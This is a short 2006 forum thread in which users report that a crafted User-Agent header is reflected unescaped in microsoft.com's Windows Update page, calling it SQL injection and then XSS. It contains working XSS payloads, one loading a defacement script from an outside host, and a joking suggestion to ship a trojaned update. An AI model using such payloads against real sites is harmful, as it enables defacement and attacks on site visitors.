HomepageOther stuffwww.microsoft.com - SQL-Injection?| Author | Post | |||
theblacksheep       |
Hi, I was looking for some updates and so I visited the microsoft.com web site. As you might know do I always fake my HTTP headers in such a way, that they are likely to create SQL errors when used unfiltered in SQL statements. For example my Browser: Shadow("><script type="text/javascript>alert('hello');</script><"'UNION/*) Then just go to microsoft.com and visit the link "Microsoft Update".  Quote from Microsoft:<"'UNION/*)".toLowerCase(); var g_sDisableWGACheck = "false"; var g_sWGACOAReturnValues ="0,6-Success;1,7,8,9,10-ErrPage1;2-ErrPage2;3-ErrPage3;4,5-ErrPage4"; var g_bWGAEnablePingback = true; var g_sWGAMinVersion = "1,3,254,0"; var conLangCode = "en"; var g_sQSProductName = ''; I just wanted to tell you about this  theblacksheep |
|||
Edited by theblacksheep on 02.01.2006 11:53:00 | ||||
 02.01.2006 10:44:41 |
|
|||
mxn  |
neat discovery checkout the source if there is some html or just plaintext |
|||
|
02.01.2006 13:22:45 |
|
|||
quangntenemy           |
I think it's just an XSS bug  Quote:test";</script></head><body><script src="http://www.freewebs.com/quangntenemy/xssdefaced.js"></script></body></html> |
|||
 02.01.2006 13:29:05 |
|
|||
|
theblacksheep |
Here it goes:  Source code of default.aspxMaybe it is really just a XSS bug. @all BlackHats: Time to prepare a Windows update with a trojan it it  |
|||
Edited by theblacksheep on 02.01.2006 13:37:48 | ||||
|
02.01.2006 13:30:43 |
|
|||
private message
EMail
Website